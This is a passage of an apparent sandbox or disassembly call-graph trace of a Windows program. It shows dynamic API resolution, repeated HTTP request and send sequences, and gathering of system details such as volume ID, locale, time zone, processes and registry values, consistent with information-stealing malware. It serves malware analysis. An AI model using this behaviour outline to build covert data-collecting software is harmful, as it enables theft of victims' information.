14516->14517 14518 ee45c0 2 API calls 14517->14518 14519 ee4464 14518->14519 14520 ee45c0 2 API calls 14519->14520 14521 ee447d 14520->14521 14522 ee45c0 2 API calls 14521->14522 14523 ee4496 14522->14523 14524 ee45c0 2 API calls 14523->14524 14525 ee44af 14524->14525 14526 ee45c0 2 API calls 14525->14526 14527 ee44c8 14526->14527 14528 ee45c0 2 API calls 14527->14528 14529 ee44e1 14528->14529 14530 ee45c0 2 API calls 14529->14530 14531 ee44fa 14530->14531 14532 ee45c0 2 API calls 14531->14532 14533 ee4513 14532->14533 14534 ee45c0 2 API calls 14533->14534 14535 ee452c 14534->14535 14536 ee45c0 2 API calls 14535->14536 14537 ee4545 14536->14537 14538 ee45c0 2 API calls 14537->14538 14539 ee455e 14538->14539 14540 ee45c0 2 API calls 14539->14540 14541 ee4577 14540->14541 14542 ee45c0 2 API calls 14541->14542 14543 ee4590 14542->14543 14544 ee45c0 2 API calls 14543->14544 14545 ee45a9 14544->14545 14546 ef9c10 14545->14546 14547 efa036 8 API calls 14546->14547 14548 ef9c20 43 API calls 14546->14548 14549 efa0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14547->14549 14550 efa146 14547->14550 14548->14547 14549->14550 14551 efa216 14550->14551 14552 efa153 8 API calls 14550->14552 14553 efa21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14551->14553 14554 efa298 14551->14554 14552->14551 14553->14554 14555 efa337 14554->14555 14556 efa2a5 6 API calls 14554->14556 14557 efa41f 14555->14557 14558 efa344 9 API calls 14555->14558 14556->14555 14559 efa428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14557->14559 14560 efa4a2 14557->14560 14558->14557 14559->14560 14561 efa4dc 14560->14561 14562 efa4ab GetProcAddress GetProcAddress 14560->14562 14563 efa515 14561->14563 14564 efa4e5 GetProcAddress GetProcAddress 14561->14564 14562->14561 14565 efa612 14563->14565 14566 efa522 10 API calls 14563->14566 14564->14563 14567 efa67d 14565->14567 14568 efa61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14565->14568 14566->14565 14569 efa69e 14567->14569 14570 efa686 GetProcAddress 14567->14570 14568->14567 14571 ef5ca3 14569->14571 14572 efa6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14569->14572 14570->14569 14573 ee1590 14571->14573 14572->14571 15694 ee1670 14573->15694 14576 efa7a0 lstrcpy 14577 ee15b5 14576->14577 14578 efa7a0 lstrcpy 14577->14578 14579 ee15c7 14578->14579 14580 efa7a0 lstrcpy 14579->14580 14581 ee15d9 14580->14581 14582 efa7a0 lstrcpy 14581->14582 14583 ee1663 14582->14583 14584 ef5510 14583->14584 14585 ef5521 14584->14585 14586 efa820 2 API calls 14585->14586 14587 ef552e 14586->14587 14588 efa820 2 API calls 14587->14588 14589 ef553b 14588->14589 14590 efa820 2 API calls 14589->14590 14591 ef5548 14590->14591 14592 efa740 lstrcpy 14591->14592 14593 ef5555 14592->14593 14594 efa740 lstrcpy 14593->14594 14595 ef5562 14594->14595 14596 efa740 lstrcpy 14595->14596 14597 ef556f 14596->14597 14598 efa740 lstrcpy 14597->14598 14638 ef557c 14598->14638 14599 efa7a0 lstrcpy 14599->14638 14600 ef5643 StrCmpCA 14600->14638 14601 ef56a0 StrCmpCA 14602 ef57dc 14601->14602 14601->14638 14603 efa8a0 lstrcpy 14602->14603 14605 ef57e8 14603->14605 14604 ee1590 lstrcpy 14604->14638 14606 efa820 2 API calls 14605->14606 14607 ef57f6 14606->14607 14609 efa820 2 API calls 14607->14609 14608 ef5856 StrCmpCA 14610 ef5991 14608->14610 14608->14638 14613 ef5805 14609->14613 14612 efa8a0 lstrcpy 14610->14612 14611 efa740 lstrcpy 14611->14638 14614 ef599d 14612->14614 14615 ee1670 lstrcpy 14613->14615 14617 efa820 2 API calls 14614->14617 14635 ef5811 14615->14635 14616 efa820 lstrlen lstrcpy 14616->14638 14618 ef59ab 14617->14618 14620 efa820 2 API calls 14618->14620 14619 ef5a0b StrCmpCA 14621 ef5a28 14619->14621 14622 ef5a16 Sleep 14619->14622 14625 ef59ba 14620->14625 14623 efa8a0 lstrcpy 14621->14623 14622->14638 14626 ef5a34 14623->14626 14624 efa8a0 lstrcpy 14624->14638 14627 ee1670 lstrcpy 14625->14627 14628 efa820 2 API calls 14626->14628 14627->14635 14629 ef5a43 14628->14629 14631 efa820 2 API calls 14629->14631 14630 ef52c0 25 API calls 14630->14638 14632 ef5a52 14631->14632 14634 ee1670 lstrcpy 14632->14634 14633 ef578a StrCmpCA 14633->14638 14634->14635 14635->13691 14636 ef593f StrCmpCA 14636->14638 14637 ef51f0 20 API calls 14637->14638 14638->14599 14638->14600 14638->14601 14638->14604 14638->14608 14638->14611 14638->14616 14638->14619 14638->14624 14638->14630 14638->14633 14638->14636 14638->14637 14640 ef754c 14639->14640 14641 ef7553 GetVolumeInformationA 14639->14641 14640->14641 14643 ef7591 14641->14643 14642 ef75fc GetProcessHeap RtlAllocateHeap 14644 ef7619 14642->14644 14645 ef7628 wsprintfA 14642->14645 14643->14642 14646 efa740 lstrcpy 14644->14646 14647 efa740 lstrcpy 14645->14647 14648 ef5da7 14646->14648 14647->14648 14648->13712 14650 efa7a0 lstrcpy 14649->14650 14651 ee4899 14650->14651 15703 ee47b0 14651->15703 14653 ee48a5 14654 efa740 lstrcpy 14653->14654 14655 ee48d7 14654->14655 14656 efa740 lstrcpy 14655->14656 14657 ee48e4 14656->14657 14658 efa740 lstrcpy 14657->14658 14659 ee48f1 14658->14659 14660 efa740 lstrcpy 14659->14660 14661 ee48fe 14660->14661 14662 efa740 lstrcpy 14661->14662 14663 ee490b InternetOpenA StrCmpCA 14662->14663 14664 ee4944 14663->14664 14665 ee4ecb InternetCloseHandle 14664->14665 15709 ef8b60 14664->15709 14667 ee4ee8 14665->14667 15724 ee9ac0 CryptStringToBinaryA 14667->15724 14668 ee4963 15717 efa920 14668->15717 14671 ee4976 14673 efa8a0 lstrcpy 14671->14673 14678 ee497f 14673->14678 14674 efa820 2 API calls 14675 ee4f05 14674->14675 14677 efa9b0 4 API calls 14675->14677 14676 ee4f27 codecvt 14680 efa7a0 lstrcpy 14676->14680 14679 ee4f1b 14677->14679 14682 efa9b0 4 API calls 14678->14682 14681 efa8a0 lstrcpy 14679->14681 14693 ee4f57 14680->14693 14681->14676 14683 ee49a9 14682->14683 14684 efa8a0 lstrcpy 14683->14684 14685 ee49b2 14684->14685 14686 efa9b0 4 API calls 14685->14686 14687 ee49d1 14686->14687 14688 efa8a0 lstrcpy 14687->14688 14689 ee49da 14688->14689 14690 efa920 3 API calls 14689->14690 14691 ee49f8 14690->14691 14692 efa8a0 lstrcpy 14691->14692 14694 ee4a01 14692->14694 14693->13715 14695 efa9b0 4 API calls 14694->14695 14696 ee4a20 14695->14696 14697 efa8a0 lstrcpy 14696->14697 14698 ee4a29 14697->14698 14699 efa9b0 4 API calls 14698->14699 14700 ee4a48 14699->14700 14701 efa8a0 lstrcpy 14700->14701 14702 ee4a51 14701->14702 14703 efa9b0 4 API calls 14702->14703 14704 ee4a7d 14703->14704 14705 efa920 3 API calls 14704->14705 14706 ee4a84 14705->14706 14707 efa8a0 lstrcpy 14706->14707 14708 ee4a8d 14707->14708 14709 ee4aa3 InternetConnectA 14708->14709 14709->14665 14710 ee4ad3 HttpOpenRequestA 14709->14710 14712 ee4ebe InternetCloseHandle 14710->14712 14713 ee4b28 14710->14713 14712->14665 14714 efa9b0 4 API calls 14713->14714 14715 ee4b3c 14714->14715 14716 efa8a0 lstrcpy 14715->14716 14717 ee4b45 14716->14717 14718 efa920 3 API calls 14717->14718 14719 ee4b63 14718->14719 14720 efa8a0 lstrcpy 14719->14720 14721 ee4b6c 14720->14721 14722 efa9b0 4 API calls 14721->14722 14723 ee4b8b 14722->14723 14724 efa8a0 lstrcpy 14723->14724 14725 ee4b94 14724->14725 14726 efa9b0 4 API calls 14725->14726 14727 ee4bb5 14726->14727 14728 efa8a0 lstrcpy 14727->14728 14729 ee4bbe 14728->14729 14730 efa9b0 4 API calls 14729->14730 14731 ee4bde 14730->14731 14732 efa8a0 lstrcpy 14731->14732 14733 ee4be7 14732->14733 14734 efa9b0 4 API calls 14733->14734 14735 ee4c06 14734->14735 14736 efa8a0 lstrcpy 14735->14736 14737 ee4c0f 14736->14737 14738 efa920 3 API calls 14737->14738 14739 ee4c2d 14738->14739 14740 efa8a0 lstrcpy 14739->14740 14741 ee4c36 14740->14741 14742 efa9b0 4 API calls 14741->14742 14743 ee4c55 14742->14743 14744 efa8a0 lstrcpy 14743->14744 14745 ee4c5e 14744->14745 14746 efa9b0 4 API calls 14745->14746 14747 ee4c7d 14746->14747 14748 efa8a0 lstrcpy 14747->14748 14749 ee4c86 14748->14749 14750 efa920 3 API calls 14749->14750 14751 ee4ca4 14750->14751 14752 efa8a0 lstrcpy 14751->14752 14753 ee4cad 14752->14753 14754 efa9b0 4 API calls 14753->14754 14755 ee4ccc 14754->14755 14756 efa8a0 lstrcpy 14755->14756 14757 ee4cd5 14756->14757 14758 efa9b0 4 API calls 14757->14758 14759 ee4cf6 14758->14759 14760 efa8a0 lstrcpy 14759->14760 14761 ee4cff 14760->14761 14762 efa9b0 4 API calls 14761->14762 14763 ee4d1f 14762->14763 14764 efa8a0 lstrcpy 14763->14764 14765 ee4d28 14764->14765 14766 efa9b0 4 API calls 14765->14766 14767 ee4d47 14766->14767 14768 efa8a0 lstrcpy 14767->14768 14769 ee4d50 14768->14769 14770 efa920 3 API calls 14769->14770 14771 ee4d6e 14770->14771 14772 efa8a0 lstrcpy 14771->14772 14773 ee4d77 14772->14773 14774 efa740 lstrcpy 14773->14774 14775 ee4d92 14774->14775 14776 efa920 3 API calls 14775->14776 14777 ee4db3 14776->14777 14778 efa920 3 API calls 14777->14778 14779 ee4dba 14778->14779 14780 efa8a0 lstrcpy 14779->14780 14781 ee4dc6 14780->14781 14782 ee4de7 lstrlen 14781->14782 14783 ee4dfa 14782->14783 14784 ee4e03 lstrlen 14783->14784 15723 efaad0 14784->15723 14786 ee4e13 HttpSendRequestA 14787 ee4e32 InternetReadFile 14786->14787 14788 ee4e67 InternetCloseHandle 14787->14788 14793 ee4e5e 14787->14793 14790 efa800 14788->14790 14790->14712 14791 efa9b0 4 API calls 14791->14793 14792 efa8a0 lstrcpy 14792->14793 14793->14787 14793->14788 14793->14791 14793->14792 15730 efaad0 14794->15730 14796 ef17c4 StrCmpCA 14797 ef17cf ExitProcess 14796->14797 14798 ef17d7 14796->14798 14799 ef19c2 14798->14799 14800 ef18cf StrCmpCA 14798->14800 14801 ef18ad StrCmpCA 14798->14801 14802 ef187f StrCmpCA 14798->14802 14803 ef185d StrCmpCA 14798->14803 14804 ef1913 StrCmpCA 14798->14804 14805 ef1932 StrCmpCA 14798->14805 14806 ef18f1 StrCmpCA 14798->14806 14807 ef1951 StrCmpCA 14798->14807 14808 ef1970 StrCmpCA 14798->14808 14809 efa820 lstrlen lstrcpy 14798->14809 14799->13717 14800->14798 14801->14798 14802->14798 14803->14798 14804->14798 14805->14798 14806->14798 14807->14798 14808->14798 14809->14798 14811 efa7a0 lstrcpy 14810->14811 14812 ee5979 14811->14812 14813 ee47b0 2 API calls 14812->14813 14814 ee5985 14813->14814 14815 efa740 lstrcpy 14814->14815 14816 ee59ba 14815->14816 14817 efa740 lstrcpy 14816->14817 14818 ee59c7 14817->14818 14819 efa740 lstrcpy 14818->14819 14820 ee59d4 14819->14820 14821 efa740 lstrcpy 14820->14821 14822 ee59e1 14821->14822 14823 efa740 lstrcpy 14822->14823 14824 ee59ee InternetOpenA StrCmpCA 14823->14824 14825 ee5a1d 14824->14825 14826 ee5fc3 InternetCloseHandle 14825->14826 14827 ef8b60 3 API calls 14825->14827 14828 ee5fe0 14826->14828 14829 ee5a3c 14827->14829 14831 ee9ac0 4 API calls 14828->14831 14830 efa920 3 API calls 14829->14830 14832 ee5a4f 14830->14832 14833 ee5fe6 14831->14833 14834 efa8a0 lstrcpy 14832->14834 14835 efa820 2 API calls 14833->14835 14837 ee601f codecvt 14833->14837 14839 ee5a58 14834->14839 14836 ee5ffd 14835->14836 14838 efa9b0 4 API calls 14836->14838 14841 efa7a0 lstrcpy 14837->14841 14840 ee6013 14838->14840 14843 efa9b0 4 API calls 14839->14843 14842 efa8a0 lstrcpy 14840->14842 14851 ee604f 14841->14851 14842->14837 14844 ee5a82 14843->14844 14845 efa8a0 lstrcpy 14844->14845 14846 ee5a8b 14845->14846 14847 efa9b0 4 API calls 14846->14847 14848 ee5aaa 14847->14848 14849 efa8a0 lstrcpy 14848->14849 14850 ee5ab3 14849->14850 14852 efa920 3 API calls 14850->14852 14851->13723 14853 ee5ad1 14852->14853 14854 efa8a0 lstrcpy 14853->14854 14855 ee5ada 14854->14855 14856 efa9b0 4 API calls 14855->14856 14857 ee5af9 14856->14857 14858 efa8a0 lstrcpy 14857->14858 14859 ee5b02 14858->14859 14860 efa9b0 4 API calls 14859->14860 14861 ee5b21 14860->14861 14862 efa8a0 lstrcpy 14861->14862 14863 ee5b2a 14862->14863 14864 efa9b0 4 API calls 14863->14864 14865 ee5b56 14864->14865 14866 efa920 3 API calls 14865->14866 14867 ee5b5d 14866->14867 14868 efa8a0 lstrcpy 14867->14868 14869 ee5b66 14868->14869 14870 ee5b7c InternetConnectA 14869->14870 14870->14826 14871 ee5bac HttpOpenRequestA 14870->14871 14873 ee5c0b 14871->14873 14874 ee5fb6 InternetCloseHandle 14871->14874 14875 efa9b0 4 API calls 14873->14875 14874->14826 14876 ee5c1f 14875->14876 14877 efa8a0 lstrcpy 14876->14877 14878 ee5c28 14877->14878 14879 efa920 3 API calls 14878->14879 14880 ee5c46 14879->14880 14881 efa8a0 lstrcpy 14880->14881 14882 ee5c4f 14881->14882 14883 efa9b0 4 API calls 14882->14883 14884 ee5c6e 14883->14884 14885 efa8a0 lstrcpy 14884->14885 14886 ee5c77 14885->14886 14887 efa9b0 4 API calls 14886->14887 14888 ee5c98 14887->14888 14889 efa8a0 lstrcpy 14888->14889 14890 ee5ca1 14889->14890 14891 efa9b0 4 API calls 14890->14891 14892 ee5cc1 14891->14892 14893 efa8a0 lstrcpy 14892->14893 14894 ee5cca 14893->14894 14895 efa9b0 4 API calls 14894->14895 14896 ee5ce9 14895->14896 14897 efa8a0 lstrcpy 14896->14897 14898 ee5cf2 14897->14898 14899 efa920 3 API calls 14898->14899 14900 ee5d10 14899->14900 14901 efa8a0 lstrcpy 14900->14901 14902 ee5d19 14901->14902 14903 efa9b0 4 API calls 14902->14903 14904 ee5d38 14903->14904 14905 efa8a0 lstrcpy 14904->14905 14906 ee5d41 14905->14906 14907 efa9b0 4 API calls 14906->14907 14908 ee5d60 14907->14908 14909 efa8a0 lstrcpy 14908->14909 14910 ee5d69 14909->14910 14911 efa920 3 API calls 14910->14911 14912 ee5d87 14911->14912 14913 efa8a0 lstrcpy 14912->14913 14914 ee5d90 14913->14914 14915 efa9b0 4 API calls 14914->14915 14916 ee5daf 14915->14916 14917 efa8a0 lstrcpy 14916->14917 14918 ee5db8 14917->14918 14919 efa9b0 4 API calls 14918->14919 14920 ee5dd9 14919->14920 14921 efa8a0 lstrcpy 14920->14921 14922 ee5de2 14921->14922 14923 efa9b0 4 API calls 14922->14923 14924 ee5e02 14923->14924 14925 efa8a0 lstrcpy 14924->14925 14926 ee5e0b 14925->14926 14927 efa9b0 4 API calls 14926->14927 14928 ee5e2a 14927->14928 14929 efa8a0 lstrcpy 14928->14929 14930 ee5e33 14929->14930 14931 efa920 3 API calls 14930->14931 14932 ee5e54 14931->14932 14933 efa8a0 lstrcpy 14932->14933 14934 ee5e5d 14933->14934 14935 ee5e70 lstrlen 14934->14935 15731 efaad0 14935->15731 14937 ee5e81 lstrlen GetProcessHeap RtlAllocateHeap 15732 efaad0 14937->15732 14939 ee5eae lstrlen 14940 ee5ebe 14939->14940 14941 ee5ed7 lstrlen 14940->14941 14942 ee5ee7 14941->14942 14943 ee5ef0 lstrlen 14942->14943 14944 ee5f03 14943->14944 14945 ee5f1a lstrlen 14944->14945 15733 efaad0 14945->15733 14947 ee5f2a HttpSendRequestA 14948 ee5f35 InternetReadFile 14947->14948 14949 ee5f6a InternetCloseHandle 14948->14949 14953 ee5f61 14948->14953 14949->14874 14951 efa9b0 4 API calls 14951->14953 14952 efa8a0 lstrcpy 14952->14953 14953->14948 14953->14949 14953->14951 14953->14952 14955 ef1077 14954->14955 14956 ef1151 14955->14956 14957 efa820 lstrlen lstrcpy 14955->14957 14956->13725 14957->14955 14959 ef0db7 14958->14959 14960 ef0f17 14959->14960 14961 ef0e27 StrCmpCA 14959->14961 14962 ef0e67 StrCmpCA 14959->14962 14963 ef0ea4 StrCmpCA 14959->14963 14964 efa820 lstrlen lstrcpy 14959->14964 14960->13733 14961->14959 14962->14959 14963->14959 14964->14959 14968 ef0f67 14965->14968 14966 ef1044 14966->13741 14967 ef0fb2 StrCmpCA 14967->14968 14968->14966 14968->14967 14969 efa820 lstrlen lstrcpy 14968->14969 14969->14968 14971 efa740 lstrcpy 14970->14971 14972 ef1a26 14971->14972 14973 efa9b0 4 API calls 14972->14973 14974 ef1a37 14973->14974 14975 efa8a0 lstrcpy 14974->14975 14976 ef1a40 14975->14976 14977 efa9b0 4 API calls 14976->14977 14978 ef1a5b 14977->14978 14979 efa8a0 lstrcpy 14978->14979 14980 ef1a64 14979->14980 14981 efa9b0 4 API calls 14980->14981 14982 ef1a7d 14981->14982 14983 efa8a0 lstrcpy 14982->14983 14984 ef1a86 14983->14984 14985 efa9b0 4 API calls 14984->14985 14986 ef1aa1 14985->14986 14987 efa8a0 lstrcpy 14986->14987 14988 ef1aaa 14987->14988 14989 efa9b0 4 API calls 14988->14989 14990 ef1ac3 14989->14990 14991 efa8a0 lstrcpy 14990->14991 14992 ef1acc 14991->14992 14993 efa9b0 4 API calls 14992->14993 14994 ef1ae7 14993->14994 14995 efa8a0 lstrcpy 14994->14995 14996 ef1af0 14995->14996 14997 efa9b0 4 API calls 14996->14997 14998 ef1b09 14997->14998 14999 efa8a0 lstrcpy 14998->14999 15000 ef1b12 14999->15000 15001 efa9b0 4 API calls 15000->15001 15002 ef1b2d 15001->15002 15003 efa8a0 lstrcpy 15002->15003 15004 ef1b36 15003->15004 15005 efa9b0 4 API calls 15004->15005 15006 ef1b4f 15005->15006 15007 efa8a0 lstrcpy 15006->15007 15008 ef1b58 15007->15008 15009 efa9b0 4 API calls 15008->15009 15010 ef1b76 15009->15010 15011 efa8a0 lstrcpy 15010->15011 15012 ef1b7f 15011->15012 15013 ef7500 6 API calls 15012->15013 15014 ef1b96 15013->15014 15015 efa920 3 API calls 15014->15015 15016 ef1ba9 15015->15016 15017 efa8a0 lstrcpy 15016->15017 15018 ef1bb2 15017->15018 15019 efa9b0 4 API calls 15018->15019 15020 ef1bdc 15019->15020 15021 efa8a0 lstrcpy 15020->15021 15022 ef1be5 15021->15022 15023 efa9b0 4 API calls 15022->15023 15024 ef1c05 15023->15024 15025 efa8a0 lstrcpy 15024->15025 15026 ef1c0e 15025->15026 15734 ef7690 GetProcessHeap RtlAllocateHeap 15026->15734 15029 efa9b0 4 API calls 15030 ef1c2e 15029->15030 15031 efa8a0 lstrcpy 15030->15031 15032 ef1c37 15031->15032 15033 efa9b0 4 API calls 15032->15033 15034 ef1c56 15033->15034 15035 efa8a0 lstrcpy 15034->15035 15036 ef1c5f 15035->15036 15037 efa9b0 4 API calls 15036->15037 15038 ef1c80 15037->15038 15039 efa8a0 lstrcpy 15038->15039 15040 ef1c89 15039->15040 15741 ef77c0 GetCurrentProcess IsWow64Process 15040->15741 15043 efa9b0 4 API calls 15044 ef1ca9 15043->15044 15045 efa8a0 lstrcpy 15044->15045 15046 ef1cb2 15045->15046 15047 efa9b0 4 API calls 15046->15047 15048 ef1cd1 15047->15048 15049 efa8a0 lstrcpy 15048->15049 15050 ef1cda 15049->15050 15051 efa9b0 4 API calls 15050->15051 15052 ef1cfb 15051->15052 15053 efa8a0 lstrcpy 15052->15053 15054 ef1d04 15053->15054 15055 ef7850 3 API calls 15054->15055 15056 ef1d14 15055->15056 15057 efa9b0 4 API calls 15056->15057 15058 ef1d24 15057->15058 15059 efa8a0 lstrcpy 15058->15059 15060 ef1d2d 15059->15060 15061 efa9b0 4 API calls 15060->15061 15062 ef1d4c 15061->15062 15063 efa8a0 lstrcpy 15062->15063 15064 ef1d55 15063->15064 15065 efa9b0 4 API calls 15064->15065 15066 ef1d75 15065->15066 15067 efa8a0 lstrcpy 15066->15067 15068 ef1d7e 15067->15068 15069 ef78e0 3 API calls 15068->15069 15070 ef1d8e 15069->15070 15071 efa9b0 4 API calls 15070->15071 15072 ef1d9e 15071->15072 15073 efa8a0 lstrcpy 15072->15073 15074 ef1da7 15073->15074 15075 efa9b0 4 API calls 15074->15075 15076 ef1dc6 15075->15076 15077 efa8a0 lstrcpy 15076->15077 15078 ef1dcf 15077->15078 15079 efa9b0 4 API calls 15078->15079 15080 ef1df0 15079->15080 15081 efa8a0 lstrcpy 15080->15081 15082 ef1df9 15081->15082 15743 ef7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15082->15743 15085 efa9b0 4 API calls 15086 ef1e19 15085->15086 15087 efa8a0 lstrcpy 15086->15087 15088 ef1e22 15087->15088 15089 efa9b0 4 API calls 15088->15089 15090 ef1e41 15089->15090 15091 efa8a0 lstrcpy 15090->15091 15092 ef1e4a 15091->15092 15093 efa9b0 4 API calls 15092->15093 15094 ef1e6b 15093->15094 15095 efa8a0 lstrcpy 15094->15095 15096 ef1e74 15095->15096 15745 ef7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15096->15745 15099 efa9b0 4 API calls 15100 ef1e94 15099->15100 15101 efa8a0 lstrcpy 15100->15101 15102 ef1e9d 15101->15102 15103 efa9b0 4 API calls 15102->15103 15104 ef1ebc 15103->15104 15105 efa8a0 lstrcpy 15104->15105 15106 ef1ec5 15105->15106 15107 efa9b0 4 API calls 15106->15107 15108 ef1ee5 15107->15108 15109 efa8a0 lstrcpy 15108->15109 15110 ef1eee 15109->15110 15748 ef7b00 GetUserDefaultLocaleName 15110->15748 15113 efa9b0 4 API calls 15114 ef1f0e 15113->15114 15115 efa8a0 lstrcpy 15114->15115 15116 ef1f17 15115->15116 15117 efa9b0 4 API calls 15116->15117 15118 ef1f36 15117->15118 15119 efa8a0 lstrcpy 15118->15119 15120 ef1f3f 15119->15120 15121 efa9b0 4 API calls 15120->15121 15122 ef1f60 15121->15122 15123 efa8a0 lstrcpy 15122->15123 15124 ef1f69 15123->15124 15752 ef7b90 15124->15752 15126 ef1f80 15127 efa920 3 API calls 15126->15127 15128 ef1f93 15127->15128 15129 efa8a0 lstrcpy 15128->15129 15130 ef1f9c 15129->15130 15131 efa9b0 4 API calls 15130->15131 15132 ef1fc6 15131->15132 15133 efa8a0 lstrcpy 15132->15133 15134 ef1fcf 15133->15134 15135 efa9b0 4 API calls 15134->15135 15136 ef1fef 15135->15136 15137 efa8a0 lstrcpy 15136->15137 15138 ef1ff8 15137->15138 15764 ef7d80 GetSystemPowerStatus 15138->15764 15141 efa9b0 4 API calls 15142 ef2018 15141->15142 15143 efa8a0 lstrcpy 15142->15143 15144 ef2021 15143->15144 15145 efa9b0 4 API calls 15144->15145 15146 ef2040 15145->15146 15147 efa8a0 lstrcpy 15146->15147 15148 ef2049 15147->15148 15149 efa9b0 4 API calls 15148->15149 15150 ef206a 15149->15150 15151 efa8a0 lstrcpy 15150->15151 15152 ef2073 15151->15152 15153 ef207e GetCurrentProcessId 15152->15153 15766 ef9470 OpenProcess 15153->15766 15156 efa920 3 API calls 15157 ef20a4 15156->15157 15158 efa8a0 lstrcpy 15157->15158 15159 ef20ad 15158->15159 15160 efa9b0 4 API calls 15159->15160 15161 ef20d7 15160->15161 15162 efa8a0 lstrcpy 15161->15162 15163 ef20e0 15162->15163 15164 efa9b0 4 API calls 15163->15164 15165 ef2100 15164->15165 15166 efa8a0 lstrcpy 15165->15166 15167 ef2109 15166->15167 15771 ef7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15167->15771 15170 efa9b0 4 API calls 15171 ef2129 15170->15171 15172 efa8a0 lstrcpy 15171->15172 15173 ef2132 15172->15173 15174 efa9b0 4 API calls 15173->15174 15175 ef2151 15174->15175 15176 efa8a0 lstrcpy 15175->15176 15177 ef215a 15176->15177 15178 efa9b0 4 API calls 15177->15178 15179 ef217b 15178->15179 15180 efa8a0 lstrcpy 15179->15180 15181 ef2184 15180->15181 15775 ef7f60 15181->15775 15184 efa9b0 4 API calls 15185 ef21a4 15184->15185 15186 efa8a0 lstrcpy 15185->15186 15187 ef21ad 15186->15187 15188 efa9b0 4 API calls 15187->15188 15189 ef21cc 15188->15189 15190 efa8a0 lstrcpy 15189->15190 15191 ef21d5 15190->15191 15192 efa9b0 4 API calls 15191->15192 15193 ef21f6 15192->15193 15194 efa8a0 lstrcpy 15193->15194 15195 ef21ff 15194->15195 15788 ef7ed0 GetSystemInfo wsprintfA 15195->15788 15198 efa9b0 4 API calls 15199 ef221f 15198->15199 15200 efa8a0 lstrcpy 15199->15200 15201 ef2228 15200->15201 15202 efa9b0 4 API calls 15201->15202 15203 ef2247 15202->15203 15204 efa8a0 lstrcpy 15203->15204 15205 ef2250 15204->15205 15206 efa9b0 4 API calls 15205->15206 15207 ef2270 15206->15207 15208 efa8a0 lstrcpy 15207->15208 15209 ef2279 15208->15209 15790 ef8100 GetProcessHeap RtlAllocateHeap 15209->15790 15212 efa9b0 4 API calls 15213 ef2299 15212->15213 15214 efa8a0 lstrcpy 15213->15214 15215 ef22a2 15214->15215 15216 efa9b0 4 API calls 15215->15216 15217 ef22c1 15216->15217 15218 efa8a0 lstrcpy 15217->15218 15219 ef22ca 15218->15219 15220 efa9b0 4 API calls 15219->15220 15221 ef22eb 15220->15221 15222 efa8a0 lstrcpy 15221->15222 15223 ef22f4 15222->15223 15796 ef87c0 15223->15796 15226 efa920 3 API calls 15227 ef231e 15226->15227 15228 efa8a0 lstrcpy 15227->15228 15229 ef2327 15228->15229 15230 efa9b0 4 API calls 15229->15230 15231 ef2351 15230->15231 15232 efa8a0 lstrcpy 15231->15232 15233 ef235a 15232->15233 15234 efa9b0 4 API calls 15233->15234 15235 ef237a 15234->15235 15236 efa8a0 lstrcpy 15235->15236 15237 ef2383 15236->15237 15238 efa9b0 4 API calls 15237->15238 15239 ef23a2 15238->15239 15240 efa8a0 lstrcpy 15239->15240 15241 ef23ab 15240->15241 15801 ef81f0 15241->15801 15243 ef23c2 15244 efa920 3 API calls 15243->15244 15245 ef23d5 15244->15245 15246 efa8a0 lstrcpy 15245->15246 15247 ef23de 15246->15247 15248 efa9b0 4 API calls 15247->15248 15249 ef240a 15248->15249 15250 efa8a0 lstrcpy 15249->15250 15251 ef2413 15250->15251 15252 efa9b0 4 API calls 15251->15252 15253 ef2432 15252->15253 15254 efa8a0 lstrcpy 15253->15254 15255 ef243b 15254->15255 15256 efa9b0 4 API calls 15255->15256 15257 ef245c 15256->15257 15258 efa8a0 lstrcpy 15257->15258 15259 ef2465 15258->15259 15260 efa9b0 4 API calls 15259->15260 15261 ef2484 15260->15261 15262 efa8a0 lstrcpy 15261->15262 15263 ef248d 15262->15263 15264 efa9b0 4 API calls 15263->15264 15265 ef24ae 15264->15265 15266 efa8a0 lstrcpy 15265->15266 15267 ef24b7 15266->15267 15809 ef8320 15267->15809 15269 ef24d3 15270 efa920 3 API calls 15269->15270 15271 ef24e6 15270->15271 15272 efa8a0 lstrcpy 15271->15272 15273 ef24ef 15272->15273 15274 efa9b0 4 API calls 15273->15274 15275 ef2519 15274->15275 15276 efa8a0 lstrcpy 15275->15276 15277 ef2522 15276->15277 15278 efa9b0 4 API calls 15277->15278 15279 ef2543 15278->15279 15280 efa8a0 lstrcpy 15279->15280 15281 ef254c 15280->15281 15282 ef8320 17 API calls 15281->15282 15283 ef2568 15282->15283 15284 efa920 3 API calls 15283->15284 15285 ef257b 15284->15285 15286 efa8a0 lstrcpy 15285->15286 15287 ef2584 15286->15287 15288 efa9b0 4 API calls 15287->15288 15289 ef25ae 15288->15289 15290 efa8a0 lstrcpy 15289->15290 15291 ef25b7 15290->15291 15292 efa9b0 4 API calls 15291->15292 15293 ef25d6 15292->15293 15294 efa8a0 lstrcpy 15293->15294 15295 ef25df 15294->15295 15296 efa9b0 4 API calls 15295->15296 15297 ef2600 15296->15297 15298 efa8a0 lstrcpy 15297->15298 15299 ef2609 15298->15299 15845 ef8680 15299->15845 15301 ef2620 15302 efa920 3 API calls 15301->15302 15303 ef2633 15302->15303 15304 efa8a0 lstrcpy 15303->15304 15305 ef263c 15304->15305 15306 ef265a lstrlen 15305->15306 15307 ef266a 15306->15307 15308 efa740 lstrcpy 15307->15308 15309 ef267c 15308->15309 15310 ee1590 lstrcpy 15309->15310 15311 ef268d 15310->15311 15855 ef5190 15311->15855 15313 ef2699 15313->13745 16043 efaad0 15314->16043 15316 ee5009 InternetOpenUrlA 15319 ee5021 15316->15319 15317 ee502a InternetReadFile 15317->15319 15318 ee50a0 InternetCloseHandle InternetCloseHandle 15320 ee50ec 15318->15320 15319->15317 15319->15318 15320->13749 16044 ee98d0 15321->16044 15323 ef0759 15324 ef0a38 15323->15324 15325 ef077d 15323->15325 15326 ee1590 lstrcpy 15324->15326 15327 ef0799 StrCmpCA 15325->15327 15328 ef0a49 15326->15328 15329 ef0843 15327->15329 15330 ef07a8 15327->15330 16220 ef0250 15328->16220 15334 ef0865 StrCmpCA 15329->15334 15332 efa7a0 lstrcpy 15330->15332 15335 ef07c3 15332->15335 